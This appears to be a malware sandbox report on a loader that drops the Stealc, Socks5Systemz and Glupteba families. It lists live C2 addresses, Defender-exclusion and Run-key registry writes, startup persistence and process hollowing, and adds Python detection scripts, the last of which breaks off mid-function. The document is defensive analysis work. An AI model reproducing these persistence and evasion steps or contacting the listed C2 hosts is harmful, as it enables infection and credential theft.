Analysis
max time kernel: 862s
max time network: 862s
platform: windows10-1703_x64
resource: win10-20240221-en
resource tags: arch:x64, arch:x86, image:win10-20240221-en, locale:en-us, os:windows10-1703-x64, system
submitted: 12-03-2024 13:07
Static task: static1
General
Target: file.exe
Size: 39KB
MD5: 699e79d0f4a7586ffe53d0dabc5c0a5a
SHA1: 7178ab85fe6190259b64846c76af01b8da5b0cd4
SHA256: b930e1b461a4c64396b0c52f17d7c504a5e8dc24114ff186eb129e8a548143ca
SHA512: 56bab1c5eaf18bef213da76f8c5ccdc15ce6fd59d93cfff77604378a1f474f2045d975ebd14563f712c9054f0a6b8e35c42f311322bca192d1f68bf5684aa526
SSDEEP: 768:sRyIN4srhwS4CGlB7+zM2WiWYiP8gzBggIfiN5SNUJ:2yIN42h6n2rWiKPPzBm9Ns
Malware Config
Extracted: stealc
C2: http://185.172.128.145
url_path: /3cd2b41cbde8fc9c.php
Extracted: socks5systemz
C2: http://bghmfep.com/search/?q=67e28dd86d58f02d130da81f7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4de8889b5e4fa9281ae978a571ea771795af8e05c644db22f31dfe339426fa11a366c350adb719a9577e55b8603e983a608fff13c4e79c993d
Signatures

Glupteba payload 10 IoCs
The same 0x00400000-0x00D1C000 image region is matched in three PIDs (688 and 19500, both oHE5OfAE7uZo5wM5zxGSo2Yh.exe, and 20712, the dropped csrss.exe). At roughly 9.5 MB it cannot be embedded in the 39KB file.exe, so the Glupteba stage was downloaded during the run.
resource  yara_rule
behavioral1/memory/688-113-0x0000000002DD0000-0x00000000036BB000-memory.dmp  family_glupteba
behavioral1/memory/688-115-0x0000000000400000-0x0000000000D1C000-memory.dmp  family_glupteba
behavioral1/memory/688-231-0x0000000002DD0000-0x00000000036BB000-memory.dmp  family_glupteba
behavioral1/memory/688-248-0x0000000000400000-0x0000000000D1C000-memory.dmp  family_glupteba
behavioral1/memory/688-529-0x0000000000400000-0x0000000000D1C000-memory.dmp  family_glupteba
behavioral1/memory/688-539-0x0000000000400000-0x0000000000D1C000-memory.dmp  family_glupteba
behavioral1/memory/19500-547-0x0000000000400000-0x0000000000D1C000-memory.dmp  family_glupteba
behavioral1/memory/19500-1298-0x0000000000400000-0x0000000000D1C000-memory.dmp  family_glupteba
behavioral1/memory/20712-1851-0x0000000000400000-0x0000000000D1C000-memory.dmp  family_glupteba
behavioral1/memory/20712-2090-0x0000000000400000-0x0000000000D1C000-memory.dmp  family_glupteba
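The ten memory matches above, parsed and grouped by PID, as an added Python example that is not part of the sandbox output. The match strings and the PID-to-image map are copied from this report; the line format is the sandbox's `behavioral1/memory/<pid>-<seq>-0x<start>-0x<end>-memory.dmp <rule>` as it appears on the page. It shows the one region that recurs across all three processes and its size.

```python
"""Parse sandbox yara memory-match lines and group them by PID so a
payload that moves between processes is visible at a glance.
Added example; the match lines and PID_IMAGE map are copied from this
report, not generated by the sandbox."""
import re
from collections import defaultdict

MATCH_RE = re.compile(
    r"^behavioral1/memory/(?P<pid>\d+)-(?P<seq>\d+)-"
    r"0x(?P<start>[0-9A-Fa-f]+)-0x(?P<end>[0-9A-Fa-f]+)-memory\.dmp\s+(?P<rule>\S+)$"
)

# Copied from the "Glupteba payload" signature above.
GLUPTEBA_MATCHES = [
    "behavioral1/memory/688-113-0x0000000002DD0000-0x00000000036BB000-memory.dmp family_glupteba",
    "behavioral1/memory/688-115-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba",
    "behavioral1/memory/688-231-0x0000000002DD0000-0x00000000036BB000-memory.dmp family_glupteba",
    "behavioral1/memory/688-248-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba",
    "behavioral1/memory/688-529-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba",
    "behavioral1/memory/688-539-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba",
    "behavioral1/memory/19500-547-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba",
    "behavioral1/memory/19500-1298-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba",
    "behavioral1/memory/20712-1851-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba",
    "behavioral1/memory/20712-2090-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba",
]

# Copied from the "Executes dropped EXE" list in this report.
PID_IMAGE = {
    688: "oHE5OfAE7uZo5wM5zxGSo2Yh.exe",
    19500: "oHE5OfAE7uZo5wM5zxGSo2Yh.exe",
    20712: "csrss.exe",
}


def parse_match(line):
    """Turn one match line into a dict with integer addresses and size."""
    m = MATCH_RE.match(line.strip())
    if not m:
        raise ValueError(f"unrecognised match line: {line!r}")
    start, end = int(m["start"], 16), int(m["end"], 16)
    return {
        "pid": int(m["pid"]), "seq": int(m["seq"]),
        "start": start, "end": end, "size": end - start, "rule": m["rule"],
    }


def regions_by_pid(lines):
    """{pid: {(start, end), ...}}, de-duplicating repeated dumps of a region."""
    out = defaultdict(set)
    for line in lines:
        r = parse_match(line)
        out[r["pid"]].add((r["start"], r["end"]))
    return dict(out)


def shared_regions(by_pid):
    """Regions that occur in more than one PID, mapped to the sorted PID list."""
    seen = defaultdict(set)
    for pid, regions in by_pid.items():
        for region in regions:
            seen[region].add(pid)
    return {region: sorted(pids) for region, pids in seen.items() if len(pids) > 1}


def summarize(lines, pid_image):
    """Label each shared region with 'pid (image)' so the hop chain reads directly."""
    return {
        region: [f"{pid} ({pid_image.get(pid, '?')})" for pid in pids]
        for region, pids in shared_regions(regions_by_pid(lines)).items()
    }


if __name__ == "__main__":
    for region, owners in summarize(GLUPTEBA_MATCHES, PID_IMAGE).items():
        start, end = region
        print(f"0x{start:08X}-0x{end:08X} ({end - start} bytes): " + " -> ".join(owners))
```

The 0x00400000 base is the classic unrelocated image base of a 32-bit PE, so the shared region is the Glupteba executable image itself rather than a heap buffer; the 0x02DD0000 region seen only in PID 688 is the unpacked stage before it was written into its own image space.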
Socks5Systemz
Socks5Systemz is a botnet written in C++.
-
Adds Windows Defender exclusions 7 IoCs
All seven writes come from the dropper oHE5OfAE7uZo5wM5zxGSo2Yh.exe. They exclude the dropper itself, the csrss.exe and windefender.exe it later drops, and the directories they are written to (C:\Windows\rss, C:\Users\Admin\AppData\Local\Temp\csrss, C:\Windows\System32\drivers) from Defender scanning, which only works because the process is already running with administrative rights.
description  ioc  Process
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"  oHE5OfAE7uZo5wM5zxGSo2Yh.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"  oHE5OfAE7uZo5wM5zxGSo2Yh.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\oHE5OfAE7uZo5wM5zxGSo2Yh.exe = "0"  oHE5OfAE7uZo5wM5zxGSo2Yh.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"  oHE5OfAE7uZo5wM5zxGSo2Yh.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"  oHE5OfAE7uZo5wM5zxGSo2Yh.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"  oHE5OfAE7uZo5wM5zxGSo2Yh.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"  oHE5OfAE7uZo5wM5zxGSo2Yh.exe
Contacts a large (4190) number of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 1 IoCs
pid  Process
4416  netsh.exe
Drops startup file 15 IoCs
All 15 .bat files are written by jsc.exe, the .NET JScript compiler that file.exe injected into (see "Suspicious use of SetThreadContext" below), so a signed Microsoft binary is the process that persists the loader.
description  ioc  Process
File created  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OMZ73wMzYBIGFtY0Dtx5TycW.bat  jsc.exe
File created  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZSycrmoTPtnhPR7O2piBiomq.bat  jsc.exe
File created  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UhOWm3bR6RESh6NculSg5dpk.bat  jsc.exe
File created  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5DrxSoXwtg938SHmvxCDrt2H.bat  jsc.exe
File created  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\zoH4OECGTcIT0xdFQytq2MMG.bat  jsc.exe
File created  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hP36JmBrt0aViG4GwvO6225d.bat  jsc.exe
File created  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Y2wpU9Ny26ZERrmmkihlbLld.bat  jsc.exe
File created  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ai3tlHn31efUkct6HI9gkY6B.bat  jsc.exe
File created  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dFjX8WXWVm4vdOzYikrDfuGT.bat  jsc.exe
File created  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\W11Mh2Di3qTFZvf1aD7H4z7a.bat  jsc.exe
File created  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TcYmft0LC42h6XXFTq7EwxeN.bat  jsc.exe
File created  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3B9aAiSWh6RSdiq06PbJKgJJ.bat  jsc.exe
File created  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gQsHAIoW33mESx921XSFlsMO.bat  jsc.exe
File created  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\114HUw7HKIFYJ6dMgCwlzIgj.bat  jsc.exe
File created  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7bmuPd1jMty47ieUU1uexinA.bat  jsc.exe
Executes dropped EXE 49 IoCs
pid  Process
22060  aCVfJ427wn6CARWtL1GFkhK1.exe
21880  aCVfJ427wn6CARWtL1GFkhK1.tmp
4320  weblinkanalyzer.exe
2184  weblinkanalyzer.exe
688  oHE5OfAE7uZo5wM5zxGSo2Yh.exe
3868  ItyNfie1VMw2nLT7eTugtvYL.exe
5968  syncUpd.exe
9488  BroomSetup.exe
12036  CkelNmqDwew6WPNzMTNOQeqx.exe
13676  CkelNmqDwew6WPNzMTNOQeqx.exe
14428  CkelNmqDwew6WPNzMTNOQeqx.exe
14960  CkelNmqDwew6WPNzMTNOQeqx.exe
15204  CkelNmqDwew6WPNzMTNOQeqx.exe
19500  oHE5OfAE7uZo5wM5zxGSo2Yh.exe
20712  csrss.exe
22252  injector.exe
21240  windefender.exe
9960  windefender.exe
20248  HIIEBAFCBK.exe
6864  Assistant_108.0.5067.20_Setup.exe_sfx.exe
11556  assistant_installer.exe
15312  assistant_installer.exe
20592  HIIEBAFCBK.exe
6200  dcb505dc2b9d8aac05f4ca0727f5eadb.exe
8040  713674d5e968cbe2102394be0b2bae6f.exe
1888  1bf850b4d9587c1017a75a47680584c4.exe
10020  uU0jFy7gS9hEAPMIe43bhoBX.exe
11644  3hR8i08CkrUYFyeQRQrcPsfW.exe
11796  syncUpd.exe
20496  uU0jFy7gS9hEAPMIe43bhoBX.exe
13620  sO7J9X3BBbRMGvIrK0o2MAfH.exe
13668  o80VeACipQO1BsWWJMh5Q0G4.exe
13716  o80VeACipQO1BsWWJMh5Q0G4.exe
13736  sO7J9X3BBbRMGvIrK0o2MAfH.tmp
13848  o80VeACipQO1BsWWJMh5Q0G4.exe
4160  0O4uZyUrqIFSEpTeH1H0rg8K.exe
4700  bhJRGCgBFLmbnysHYxZIy2UZ.exe
2780  bhJRGCgBFLmbnysHYxZIy2UZ.tmp
5892  kL5MaQu7jAAGIFgNQb6ujSPo.exe
6012  0O4uZyUrqIFSEpTeH1H0rg8K.exe
1284  syncUpd.exe
7892  RAus8SFt5ecM23w4L2GQk0YC.exe
7944  RAus8SFt5ecM23w4L2GQk0YC.exe
6392  RAus8SFt5ecM23w4L2GQk0YC.exe
11600  BroomSetup.exe
12044  weblinkanalyzer.exe
12612  weblinkanalyzer.exe
13360  weblinkanalyzer.exe
13392  weblinkanalyzer.exe
Loads dropped DLL 29 IoCs
pid  Process
21880  aCVfJ427wn6CARWtL1GFkhK1.tmp
3868  ItyNfie1VMw2nLT7eTugtvYL.exe (x2)
12036  CkelNmqDwew6WPNzMTNOQeqx.exe
13676  CkelNmqDwew6WPNzMTNOQeqx.exe
14428  CkelNmqDwew6WPNzMTNOQeqx.exe
14960  CkelNmqDwew6WPNzMTNOQeqx.exe
15204  CkelNmqDwew6WPNzMTNOQeqx.exe
5968  syncUpd.exe (x2)
22124  taskmgr.exe
11556  assistant_installer.exe (x2)
15312  assistant_installer.exe (x2)
11644  3hR8i08CkrUYFyeQRQrcPsfW.exe (x3)
13668  o80VeACipQO1BsWWJMh5Q0G4.exe
13716  o80VeACipQO1BsWWJMh5Q0G4.exe
13848  o80VeACipQO1BsWWJMh5Q0G4.exe
13736  sO7J9X3BBbRMGvIrK0o2MAfH.tmp
2780  bhJRGCgBFLmbnysHYxZIy2UZ.tmp
5892  kL5MaQu7jAAGIFgNQb6ujSPo.exe (x3)
7892  RAus8SFt5ecM23w4L2GQk0YC.exe
7944  RAus8SFt5ecM23w4L2GQk0YC.exe
6392  RAus8SFt5ecM23w4L2GQk0YC.exe
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
UPX packed files/memory 16 IoCs
resource  yara_rule
behavioral1/files/0x000600000001ac25-127.dat  upx
behavioral1/memory/9488-128-0x0000000000400000-0x0000000000930000-memory.dmp  upx
behavioral1/files/0x000600000001ac29-202.dat  upx
behavioral1/memory/12036-210-0x00000000009A0000-0x0000000000ED8000-memory.dmp  upx
behavioral1/files/0x000600000001ac29-212.dat  upx
behavioral1/files/0x000600000001ac29-213.dat  upx
behavioral1/memory/13676-224-0x00000000009A0000-0x0000000000ED8000-memory.dmp  upx
behavioral1/files/0x000600000001ac29-234.dat  upx
behavioral1/memory/14428-230-0x0000000000290000-0x00000000007C8000-memory.dmp  upx
behavioral1/files/0x000600000001ac37-226.dat  upx
behavioral1/memory/14960-239-0x00000000009A0000-0x0000000000ED8000-memory.dmp  upx
behavioral1/memory/15204-249-0x00000000009A0000-0x0000000000ED8000-memory.dmp  upx
behavioral1/memory/9488-253-0x0000000000400000-0x0000000000930000-memory.dmp  upx
behavioral1/files/0x000700000001ac62-2100.dat  upx
behavioral1/files/0x000600000001ad4b-4149.dat  upx
behavioral1/files/0x000600000001af9a-6479.dat  upx
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description  ioc
Destination IP  45.155.250.90
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
Both value names masquerade: "csrss" points at C:\Windows\rss\csrss.exe rather than the real C:\Windows\System32\csrss.exe, and "Ledger-Live Updater" points at a randomly named executable in the user's Temp directory, not at a Ledger Live installation. Each key is written twice, first by the dropper and then by the dropped binary itself.
description  ioc  Process
Set value (str)  \REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""  oHE5OfAE7uZo5wM5zxGSo2Yh.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""  csrss.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000\Software\Microsoft\Windows\CurrentVersion\Run\Ledger-Live Updater = "C:\\Users\\Admin\\AppData\\Local\\Temp\\HIIEBAFCBK.exe"  HIIEBAFCBK.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000\Software\Microsoft\Windows\CurrentVersion\Run\Ledger-Live Updater = "C:\\Users\\Admin\\AppData\\Local\\Temp\\HIIEBAFCBK.exe"  HIIEBAFCBK.exe
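The three persistence and defence-evasion patterns this report shows (Defender exclusion writes, Run keys whose name imitates a system binary or wallet updater but whose target is outside System32 or in a user-writable directory, and Startup-folder script drops) as one detection pass over Sysmon-style events. This is an added Python example, not part of the sandbox output. The event shape is a constructed simplification of Sysmon Event ID 13 (registry value set) and 11 (file create); the sample events reuse IoCs from this report, with one constructed benign Run entry as a control.

```python
"""Flag Defender-exclusion writes, masquerading Run keys and Startup-folder
drops in Sysmon-style events. Added example, not part of this report; the
event dicts are a constructed simplification of Sysmon IDs 11 and 13."""
import re
from dataclasses import dataclass

DEFENDER_EXCL_RE = re.compile(
    r"\\Windows Defender\\Exclusions\\(?:Paths|Processes|Extensions|TemporaryPaths)\\(?P<target>.+)$",
    re.IGNORECASE,
)
RUN_KEY_RE = re.compile(
    r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\\(?P<name>[^\\]+)$",
    re.IGNORECASE,
)
STARTUP_RE = re.compile(
    r"\\Start Menu\\Programs\\Startup\\[^\\]+\.(?:bat|cmd|vbs|js|lnk|exe|ps1)$", re.IGNORECASE
)
# Run-value names that only belong to binaries living in System32.
SYSTEM_NAMES = {"csrss", "lsass", "smss", "wininit", "winlogon", "svchost", "services"}
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\AppData\\|\\Temp\\|\\ProgramData\\", re.IGNORECASE)


@dataclass(frozen=True)
class Alert:
    rule: str
    process: str
    detail: str


def _image_from_command(cmd):
    """Executable path from a Run value: the quoted path if quoted, else the first token."""
    cmd = cmd.strip()
    if cmd.startswith('"'):
        return cmd[1:].split('"', 1)[0]
    return cmd.split(" ", 1)[0]


def check_event(ev):
    """Alerts for one event; an empty list means nothing matched."""
    alerts = []
    proc = ev.get("Image", "?")
    if ev.get("EventID") == 13:
        key = ev.get("TargetObject", "")
        m = DEFENDER_EXCL_RE.search(key)
        if m:
            alerts.append(Alert("defender_exclusion_added", proc, m["target"]))
        m = RUN_KEY_RE.search(key)
        if m:
            name = m["name"]
            exe = _image_from_command(ev.get("Details", ""))
            if name.lower() in SYSTEM_NAMES and "\\system32\\" not in exe.lower():
                alerts.append(Alert("run_key_system_name_outside_system32", proc, f"{name} -> {exe}"))
            elif USER_WRITABLE.search(exe):
                alerts.append(Alert("run_key_user_writable_path", proc, f"{name} -> {exe}"))
    elif ev.get("EventID") == 11:
        path = ev.get("TargetFilename", "")
        if STARTUP_RE.search(path):
            alerts.append(Alert("startup_folder_drop", proc, path))
    return alerts


def scan(events):
    return [a for ev in events for a in check_event(ev)]


# Constructed events; registry paths and file names are taken from this report.
SID = r"S-1-5-21-2852630833-2010812756-3750823755-1000"
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": "oHE5OfAE7uZo5wM5zxGSo2Yh.exe",
     "TargetObject": r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe",
     "Details": "DWORD (0x00000000)"},
    {"EventID": 13, "Image": "oHE5OfAE7uZo5wM5zxGSo2Yh.exe",
     "TargetObject": r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss",
     "Details": "DWORD (0x00000000)"},
    {"EventID": 13, "Image": "oHE5OfAE7uZo5wM5zxGSo2Yh.exe",
     "TargetObject": rf"\REGISTRY\USER\{SID}\Software\Microsoft\Windows\CurrentVersion\Run\csrss",
     "Details": r'"C:\Windows\rss\csrss.exe"'},
    {"EventID": 13, "Image": "HIIEBAFCBK.exe",
     "TargetObject": rf"\REGISTRY\USER\{SID}\Software\Microsoft\Windows\CurrentVersion\Run\Ledger-Live Updater",
     "Details": r"C:\Users\Admin\AppData\Local\Temp\HIIEBAFCBK.exe"},
    {"EventID": 11, "Image": "jsc.exe",
     "TargetFilename": r"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OMZ73wMzYBIGFtY0Dtx5TycW.bat"},
    # Benign control (constructed): a stock Windows Run entry under Program Files.
    {"EventID": 13, "Image": "explorer.exe",
     "TargetObject": rf"\REGISTRY\USER\{SID}\Software\Microsoft\Windows\CurrentVersion\Run\SecurityHealth",
     "Details": r'"C:\Program Files\Windows Defender\MSASCuiL.exe"'},
]

if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f"{a.rule:40} {a.process:30} {a.detail}")
```

The exclusion rule fires on every write under the Exclusions key regardless of value, because legitimate exclusion changes on workstations are rare enough to review by hand; the Run-key rules deliberately separate "system name outside System32" from "any binary in a user-writable path", since the second is noisier and may need an allow-list per estate.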
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 8 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description  ioc  Process
File opened (read-only)  \??\F:  CkelNmqDwew6WPNzMTNOQeqx.exe
File opened (read-only)  \??\D:  CkelNmqDwew6WPNzMTNOQeqx.exe
File opened (read-only)  \??\F:  CkelNmqDwew6WPNzMTNOQeqx.exe
File opened (read-only)  \??\D:  o80VeACipQO1BsWWJMh5Q0G4.exe
File opened (read-only)  \??\F:  o80VeACipQO1BsWWJMh5Q0G4.exe
File opened (read-only)  \??\D:  RAus8SFt5ecM23w4L2GQk0YC.exe
File opened (read-only)  \??\F:  RAus8SFt5ecM23w4L2GQk0YC.exe
File opened (read-only)  \??\D:  CkelNmqDwew6WPNzMTNOQeqx.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 11 IoCs
flow  ioc
7612  pastebin.com
9003  raw.githubusercontent.com
9005  raw.githubusercontent.com
3150  raw.githubusercontent.com
7203  pastebin.com
7233  pastebin.com
7249  pastebin.com
7610  pastebin.com
9006  raw.githubusercontent.com
9004  raw.githubusercontent.com
14292  pastebin.com
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow  ioc
7788  api.ipify.org
14436  api.ipify.org
Manipulates WinMonFS driver 1 IoCs
Rootkits write to WinMonFS to hide directories/files from being detected. The csrss.exe here is the dropped C:\Windows\rss\csrss.exe flagged as Glupteba above, not the Windows Client/Server Runtime process.
description  ioc  Process
File opened for modification  \??\WinMonFS  csrss.exe
Drops file in System32 directory 14 IoCs
All 14 writes are PowerShell profile and CLR usage-log files under C:\Windows\SysWOW64\config\systemprofile, which is the LocalSystem account's profile for 32-bit processes: these powershell.exe instances were 32-bit and running as SYSTEM. The files themselves are ordinary PowerShell start-up artifacts; the execution context is the finding.
description  ioc  Process
File opened for modification (x12)  C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive  powershell.exe
File created  C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive  powershell.exe
File created  C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log  powershell.exe
Suspicious use of SetThreadContext 1 IoCs
description  pid  Process  procid_target
PID 4044 set thread context of 17632  4044  file.exe  75
PID 17632 is jsc.exe (it appears with SeDebugPrivilege in the AdjustPrivilegeToken list below), the .NET JScript compiler. file.exe overwriting the thread context of a jsc.exe it controls is consistent with process hollowing, and this jsc.exe is the process that later drops the 15 Startup-folder .bat files.
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 3 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description  ioc  Process
File opened (read-only)  \??\VBoxMiniRdrDN  oHE5OfAE7uZo5wM5zxGSo2Yh.exe
File opened (read-only)  \??\VBoxMiniRdrDN  uU0jFy7gS9hEAPMIe43bhoBX.exe
File opened (read-only)  \??\VBoxMiniRdrDN  0O4uZyUrqIFSEpTeH1H0rg8K.exe
Drops file in Windows directory 8 IoCs
The two locations written by the dropper and its csrss.exe (C:\Windows\rss and C:\Windows\windefender.exe) are exactly the paths excluded from Defender above; the taskmgr.exe rescache writes are normal Task Manager resource-cache activity.
description  ioc  Process
File created  C:\Windows\rescache\_merged\1601268389\3877292338.pri  taskmgr.exe
File opened for modification  C:\Windows\rss  oHE5OfAE7uZo5wM5zxGSo2Yh.exe
File created  C:\Windows\rss\csrss.exe  oHE5OfAE7uZo5wM5zxGSo2Yh.exe
File created  C:\Windows\windefender.exe  csrss.exe
File opened for modification  C:\Windows\windefender.exe  csrss.exe
File created  C:\Windows\rescache\_merged\4183903823\810424605.pri  taskmgr.exe
File created  C:\Windows\rescache\_merged\1601268389\3877292338.pri  taskmgr.exe
File created  C:\Windows\rescache\_merged\4183903823\810424605.pri  taskmgr.exe
Launches sc.exe 1 IoCs
Sc.exe is a Windows utility to control services on the system.
pid  Process
9824  sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 2 IoCs
resource  yara_rule
behavioral1/files/0x000600000001ac1e-97.dat  nsis_installer_2
behavioral1/files/0x000e00000001aaa8-3815.dat  nsis_installer_2
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments. All six reads here come from taskmgr.exe, which queries the disk FriendlyName for its own display, so this signature is noise for this run.
description  ioc  Process
Key opened (x2)  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000  taskmgr.exe
Key opened (x2)  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A  taskmgr.exe
Key value queried (x2)  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName  taskmgr.exe
Checks processor information in registry 2 TTPs 7 IoCs
Processor information is often read in order to detect sandboxing environments. Five of the seven reads are firefox.exe reading CPU details, which a browser does routinely; the two from the dropped syncUpd.exe are the ones relevant to evasion.
description  ioc  Process
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision  firefox.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz  firefox.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier  firefox.exe
Key opened  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0  syncUpd.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  syncUpd.exe
Key opened  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0  firefox.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature  firefox.exe
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid  Process
2552  schtasks.exe
5448  schtasks.exe (x2)
21464  schtasks.exe
14436  schtasks.exe
13948  schtasks.exe
GoLang User-Agent 5 IoCs
Uses the default User-Agent string set by Go's net/http package. Glupteba is written in Go, which makes it the likely source; the report does not attribute flows to processes, so that is inference.
description  flow  ioc
HTTP User-Agent header  7473  Go-http-client/1.1
HTTP User-Agent header  7589  Go-http-client/1.1
HTTP User-Agent header  7607  Go-http-client/1.1
HTTP User-Agent header  18102  Go-http-client/1.1
HTTP User-Agent header  18111  Go-http-client/1.1
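A single triage pass over a flow/HTTP log for the network behaviours this report flags: DNS sent to a resolver other than the configured one, scan-like fan-out to thousands of hosts, the Go default User-Agent, the Stealc gate URL from the extracted config, and paste/raw-hosting and IP-lookup services. This is an added Python example, not part of the sandbox output. The record shape and the sample records are constructed, including their process attribution, which the report does not give; the hostnames, IPs and URL path are copied from this report. The configured resolver (8.8.8.8) is an assumption, and the "16 hex characters + .php" gate pattern is a heuristic generalised from the extracted url_path, not a family signature.

```python
"""Triage flow records for the network indicators this report lists.
Added example, not part of the sandbox output. Record shape, process
attribution and the resolver address are constructed assumptions."""
import re

CONFIGURED_DNS = {"8.8.8.8"}          # assumption: replace with your resolver(s)
HOSTING_ABUSED = {"pastebin.com", "raw.githubusercontent.com"}
IP_LOOKUP = {"api.ipify.org"}
GO_UA_PREFIX = "Go-http-client/"
STEALC_GATE_RE = re.compile(r"^/[0-9a-f]{16}\.php$")  # heuristic generalised from url_path above
FANOUT_THRESHOLD = 100  # distinct destination IPs per process before it looks like a scan


def triage(flows, configured_dns=CONFIGURED_DNS, fanout=FANOUT_THRESHOLD):
    """Return (rule, process, detail) tuples; order follows the input, fan-out last."""
    findings = []
    dests = {}
    for f in flows:
        proc = f.get("process", "?")
        dests.setdefault(proc, set()).add(f["dst"])
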